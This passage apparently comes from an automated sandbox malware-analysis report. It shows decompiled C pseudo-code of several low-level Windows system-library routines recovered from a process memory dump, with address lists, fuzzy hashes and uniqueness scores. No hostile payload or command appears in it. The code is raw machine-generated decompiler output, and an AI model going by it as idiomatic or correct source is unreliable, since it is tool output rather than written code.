						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E013669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x13d7c04 != 0) {
						_t118 = _v12;
						_t120 = E0136A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x13d7bd8;
						if( *0x13d7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E013295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E013299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01363540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E012EB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0132AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x13d8474 - 3;
										if( *0x13d8474 != 3) {
											 *0x13d79dc =  *0x13d79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01307D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01307D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01367016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x13d8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x13d7b00; // 0x0
							asm("ror esi, cl");
							 *0x13db1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E013295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E012F7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                            0x013103f1
                            0x013103f7
                            0x013103f9
                            0x013103fb
                            0x013103fd
                            0x01310400
                            0x0131040a
                            0x01354c7a
                            0x01310537
                            0x01310547
                            0x01310410
                            0x01310410
                            0x01310414
                            0x01310417
                            0x0131041a
                            0x01310421
                            0x01310424
                            0x0131042b
                            0x0131043b
                            0x0131043e
                            0x0131043f
                            0x0131043f
                            0x01310446
                            0x01310449
                            0x0131044c
                            0x0131044f
                            0x01310459
                            0x01354c8d
                            0x0131045f
                            0x0131045f
                            0x0131045f
                            0x01310467
                            0x01354c97
                            0x01354c9d
                            0x01354ca4
                            0x01354caa
                            0x01354caf
                            0x01354cb1
                            0x01354cc3
                            0x01354cb3
                            0x01354cbc
                            0x01354cbc
                            0x01354cc8
                            0x01354ccb
                            0x01354cd7
                            0x01354cda
                            0x01354cdf
                            0x01354cdf
                            0x01354ccb
                            0x01354ca4
                            0x0131046d
                            0x0131046f
                            0x0131046f
                            0x01310471
                            0x01310476
                            0x0131047a
                            0x0131047b
                            0x01310483
                            0x01310489
                            0x0131048d
                            0x00000000
                            0x00000000
                            0x01354ce9
                            0x01354cef
                            0x01354d22
                            0x01354d22
                            0x00000000
                            0x01354d22
                            0x01354cf1
                            0x01354cf7
                            0x00000000
                            0x00000000
                            0x01354cf9
                            0x01354cff
                            0x00000000
                            0x00000000
                            0x01354d05
                            0x01354d07
                            0x00000000
                            0x00000000
                            0x01354d0d
                            0x01354d0f
                            0x01354d14
                            0x01354d16
                            0x00000000
                            0x00000000
                            0x01354d1c
                            0x01354d1c
                            0x01310499
                            0x01310535
                            0x01310535
                            0x00000000
                            0x01310535
                            0x013104a6
                            0x01354d2c
                            0x01354d37
                            0x01354d39
                            0x01354d3b
                            0x00000000
                            0x00000000
                            0x01354d41
                            0x01354d48
                            0x01310527
                            0x0131052b
                            0x0131052d
                            0x01310530
                            0x01310530
                            0x00000000
                            0x0131052b
                            0x01354d4e
                            0x013104ac
                            0x013104ac
                            0x013104af
                            0x013104b2
                            0x013104b7
                            0x013104b9
                            0x013104bb
                            0x013104bd
                            0x013104bf
                            0x013104c5
                            0x013104c9
                            0x01354d53
                            0x01354d59
                            0x01354db9
                            0x01354dba
                            0x01354dbf
                            0x01354dc2
                            0x01354dc4
                            0x01354dc7
                            0x01354dce
                            0x00000000
                            0x01354dce
                            0x01354d5b
                            0x01354d61
                            0x00000000
                            0x00000000
                            0x01354d63
                            0x01354d69
                            0x00000000
                            0x00000000
                            0x01354d6b
                            0x01354d6e
                            0x01354d74
                            0x01354d76
                            0x01354d7c
                            0x01354d7e
                            0x01354d84
                            0x01354d89
                            0x01354d8c
                            0x01354d8d
                            0x01354d92
                            0x01354d95
                            0x01354d96
                            0x01354d98
                            0x01354d9a
                            0x01354d9f
                            0x01354da4
                            0x01354da6
                            0x01354da8
                            0x01354daf
                            0x01354db1
                            0x01354db1
                            0x01354daf
                            0x01354da6
                            0x01354d84
                            0x01354d7c
                            0x00000000
                            0x01354d74
                            0x013104d6
                            0x01354de1
                            0x013104dc
                            0x013104dc
                            0x013104dc
                            0x013104e4
                            0x01354deb
                            0x01354df1
                            0x01354df8
                            0x01354dfe
                            0x01354e03
                            0x01354e05
                            0x01354e17
                            0x01354e07
                            0x01354e10
                            0x01354e10
                            0x01354e1c
                            0x01354e1f
                            0x01354e35
                            0x01354e35
                            0x01354e1f
                            0x01354df8
                            0x013104f1
                            0x013104fa
                            0x01354e3f
                            0x01354e47
                            0x01354e5b
                            0x01354e61
                            0x01354e67
                            0x01354e69
                            0x01354e71
                            0x01354e73
                            0x01310500
                            0x01310500
                            0x01310500
                            0x013104fa
                            0x01310508
                            0x0131051d
                            0x0131051d
                            0x0131051f
                            0x01310524
                            0x00000000
                            0x01310524
                            0x01310515
                            0x01310517
                            0x01354e7a
                            0x01354e7c
                            0x00000000
                            0x00000000
                            0x01354e85
                            0x00000000
                            0x01354e85
                            0x00000000
                            0x01310517

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa03ca678f2f8f5107a4cb8f5cdf358aaad36cc81cb9fc3e635cb5511454684e
                            • Instruction ID: 7628377cc965bf98f69afc8a049ce0282213dac4597cad5b78a73371fd4d4b6e
                            • Opcode Fuzzy Hash: fa03ca678f2f8f5107a4cb8f5cdf358aaad36cc81cb9fc3e635cb5511454684e
                            • Instruction Fuzzy Hash: B8911931E042599BEB3D9A6CC844FAD7BE4AB05B1CF050265FE50AB2D5EB749C80CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012EC600, Relevance: .2, Instructions: 225COMMON
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E012EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x13dd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E012F6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0132B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x13d7b9c; // 0x0
					_t74 = L01304620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01329650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L013077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0132F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E013213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L013077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01329650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                            0x012ec608
                            0x012ec615
                            0x012ec625
                            0x012ec62d
                            0x012ec635
                            0x012ec640
                            0x012ec680
                            0x012ec687
                            0x012ec688
                            0x012ec689
                            0x012ec694
                            0x012ec694
                            0x012ec642
                            0x012ec64a
                            0x012ec697
                            0x01357a25
                            0x01357a2b
                            0x01357a2e
                            0x01357a30
                            0x01357bea
                            0x01357bea
                            0x00000000
                            0x01357bea
                            0x01357a36
                            0x01357a43
                            0x01357a48
                            0x01357a4c
                            0x01357a4e
                            0x00000000
                            0x00000000
                            0x01357a58
                            0x01357a5a
                            0x01357a5b
                            0x01357a5c
                            0x01357a5d
                            0x01357a63
                            0x01357a64
                            0x01357a6a
                            0x01357a6c
                            0x01357a6e
                            0x013579cb
                            0x013579cb
                            0x013579ce
                            0x013579d0
                            0x01357a98
                            0x01357a9b
                            0x01357a9b
                            0x01357a9e
                            0x01357aa1
                            0x01357bbe
                            0x01357bbe
                            0x01357bc0
                            0x01357be0
                            0x01357be0
                            0x01357a01
                            0x01357a01
                            0x01357a05
                            0x01357a07
                            0x01357a15
                            0x01357a15
                            0x01357a1a
                            0x00000000
                            0x01357a1a
                            0x01357bc2
                            0x01357bc6
                            0x01357bc9
                            0x01357bcd
                            0x01357bcf
                            0x013579e6
                            0x013579e6
                            0x013579eb
                            0x013579eb
                            0x013579ef
                            0x013579f1
                            0x00000000
                            0x00000000
                            0x013579f3
                            0x013579f5
                            0x013579ff
                            0x013579ff
                            0x00000000
                            0x013579ff
                            0x013579f7
                            0x013579fd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013579fd
                            0x01357bd5
                            0x01357bd8
                            0x00000000
                            0x00000000
                            0x01357ba9
                            0x01357bac
                            0x01357bb0
                            0x01357bb1
                            0x01357bb1
                            0x01357bb6
                            0x00000000
                            0x01357bb6
                            0x01357aa7
                            0x01357aaa
                            0x00000000
                            0x00000000
                            0x01357ab2
                            0x01357ab3
                            0x01357ab5
                            0x01357aec
                            0x01357aef
                            0x01357b25
                            0x01357b28
                            0x01357b62
                            0x01357b64
                            0x01357b8f
                            0x01357b92
                            0x01357b96
                            0x01357b98
                            0x00000000
                            0x00000000
                            0x01357b9e
                            0x01357b9f
                            0x01357ba3
                            0x00000000
                            0x01357ba3
                            0x01357b66
                            0x01357b68
                            0x01357ae2
                            0x01357ae2
                            0x00000000
                            0x01357ae2
                            0x01357b6e
                            0x01357b72
                            0x01357b75
                            0x01357b81
                            0x01357b85
                            0x01357b87
                            0x00000000
                            0x00000000
                            0x01357b31
                            0x01357b34
                            0x01357b3c
                            0x01357b45
                            0x01357b46
                            0x01357b4f
                            0x01357b51
                            0x01357b57
                            0x01357b59
                            0x01357b59
                            0x00000000
                            0x01357b59
                            0x01357b77
                            0x00000000
                            0x01357b77
                            0x01357b2a
                            0x00000000
                            0x01357b2a
                            0x01357af1
                            0x01357af3
                            0x00000000
                            0x00000000
                            0x01357afb
                            0x01357afc
                            0x01357afe
                            0x00000000
                            0x00000000
                            0x01357b00
                            0x01357b03
                            0x00000000
                            0x00000000
                            0x01357b05
                            0x01357b09
                            0x01357b0d
                            0x01357b0f
                            0x00000000
                            0x00000000
                            0x01357b18
                            0x01357b1d
                            0x00000000
                            0x01357b1d
                            0x01357ab7
                            0x01357ab9
                            0x00000000
                            0x00000000
                            0x01357abf
                            0x01357ac1
                            0x00000000
                            0x00000000
                            0x01357ac3
                            0x01357ac6
                            0x00000000
                            0x00000000
                            0x01357ac8
                            0x01357acc
                            0x01357ad0
                            0x01357ad2
                            0x00000000
                            0x00000000
                            0x01357adb
                            0x00000000
                            0x01357adb
                            0x013579d6
                            0x013579d9
                            0x013579dc
                            0x01357a91
                            0x01357a94
                            0x00000000
                            0x01357a94
                            0x013579e2
                            0x00000000
                            0x013579e2
                            0x01357a74
                            0x01357a7a
                            0x00000000
                            0x00000000
                            0x01357a8a
                            0x01357a21
                            0x01357a21
                            0x00000000
                            0x01357a21
                            0x012ec650
                            0x012ec651
                            0x012ec656
                            0x012ec65c
                            0x012ec65d
                            0x012ec663
                            0x012ec664
                            0x012ec66a
                            0x012ec66e
                            0x013579c5
                            0x013579c7
                            0x00000000
                            0x013579c7
                            0x012ec67a
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c554ff4480e520aea116c9204c28cf3b07a6fea72097bb563c8ceca73b4517a
                            • Instruction ID: f0e9d3e5841765607a8d78eec561a51fb6d822d6c6f8554e104d1341846fdb9a
                            • Opcode Fuzzy Hash: 6c554ff4480e520aea116c9204c28cf3b07a6fea72097bb563c8ceca73b4517a
                            • Instruction Fuzzy Hash: 7B81B2756142468FEB66CE58C880E3B77E9FB84B58F54482EEE459B341D330ED41CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0137B8D0, Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            C-Code - Quality: 39%
                            			E0137B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x13d7b9c; // 0x0
				_t124 = L01304620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01329800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E013295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E013295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L013077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01329910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E013295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x13d7b9c; // 0x0
									_t92 = L01304620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01329910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E012EA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0137E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0137E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E013295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                            0x0137b8d9
                            0x0137b8e4
                            0x00000000
                            0x0137b8e6
                            0x0137b8f3
                            0x0137b8f5
                            0x0137b8f5
                            0x0137b8f8
                            0x0137b920
                            0x0137b924
                            0x0137b936
                            0x0137b939
                            0x0137b93d
                            0x0137b948
                            0x0137b9a0
                            0x0137b9a0
                            0x0137b9a4
                            0x0137b9bf
                            0x0137b9c4
                            0x0137b9c6
                            0x0137b9cd
                            0x0137b9d1
                            0x0137bad4
                            0x0137bad8
                            0x0137bada
                            0x0137badc
                            0x0137badc
                            0x0137badf
                            0x0137bae0
                            0x0137bae2
                            0x0137bae4
                            0x0137baec
                            0x0137baee
                            0x0137baf0
                            0x0137baf0
                            0x0137baec
                            0x0137bafb
                            0x0137bafc
                            0x0137bafe
                            0x0137bb01
                            0x0137bb01
                            0x00000000
                            0x0137bb06
                            0x0137b9d7
                            0x0137b9db
                            0x0137b9db
                            0x0137b9de
                            0x0137b9de
                            0x0137b9e4
                            0x0137b9e7
                            0x0137b9ea
                            0x0137b9ec
                            0x0137b9ef
                            0x0137b9f3
                            0x0137ba1b
                            0x0137ba1b
                            0x0137ba23
                            0x0137ba24
                            0x0137ba27
                            0x0137ba2a
                            0x0137ba2b
                            0x0137ba2e
                            0x0137ba30
                            0x0137ba37
                            0x0137ba3f
                            0x0137ba9c
                            0x0137baa2
                            0x0137bb13
                            0x0137bb15
                            0x0137baae
                            0x0137baae
                            0x0137bab3
                            0x0137bab5
                            0x0137baba
                            0x0137bac8
                            0x0137bac8
                            0x0137baba
                            0x0137bacd
                            0x0137bacf
                            0x00000000
                            0x0137bacf
                            0x0137bb1a
                            0x00000000
                            0x0137bb1c
                            0x0137baa7
                            0x0137bb11
                            0x00000000
                            0x0137bb11
                            0x0137baa9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0137ba41
                            0x0137ba41
                            0x0137ba41
                            0x0137ba58
                            0x0137ba5d
                            0x0137ba62
                            0x00000000
                            0x00000000
                            0x0137ba64
                            0x0137ba67
                            0x0137ba68
                            0x0137ba69
                            0x0137ba6c
                            0x0137ba6f
                            0x0137ba71
                            0x0137ba78
                            0x0137ba80
                            0x00000000
                            0x00000000
                            0x0137ba90
                            0x0137ba90
                            0x0137ba97
                            0x00000000
                            0x0137ba97
                            0x0137b9f5
                            0x0137b9f7
                            0x0137b9f7
                            0x0137b9fa
                            0x0137ba03
                            0x0137ba07
                            0x0137ba0c
                            0x0137ba10
                            0x0137ba17
                            0x00000000
                            0x0137b9f7
                            0x0137b9a6
                            0x0137b9a8
                            0x0137b9af
                            0x0137b9b3
                            0x00000000
                            0x00000000
                            0x0137b9b9
                            0x00000000
                            0x0137b9b9
                            0x0137b94d
                            0x0137b98f
                            0x0137b995
                            0x0137b999
                            0x0137b960
                            0x0137b967
                            0x0137b968
                            0x0137b96a
                            0x00000000
                            0x0137b96a
                            0x0137b99b
                            0x0137b99e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0137b99e
                            0x0137b951
                            0x0137b954
                            0x0137b95a
                            0x0137b95e
                            0x0137b972
                            0x0137b979
                            0x0137b97d
                            0x0137b97f
                            0x0137b980
                            0x0137b982
                            0x0137b984
                            0x00000000
                            0x0137b984
                            0x00000000
                            0x0137b926
                            0x00000000
                            0x0137b926

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb83c23022e50bb855258abd7782a63aa754fe1053555640145a981d4eb1383f
                            • Instruction ID: ab8158d9f53ee093e07578c113fdae74aa116319f161e4d99aa93c60d6eab30d
                            • Opcode Fuzzy Hash: eb83c23022e50bb855258abd7782a63aa754fe1053555640145a981d4eb1383f
                            • Instruction Fuzzy Hash: 7071EE32200706EFE732EF18C844F66BBF5EF44728F244528E6659B6A4DB79E941CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01366DC9, Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E01366DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01304620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
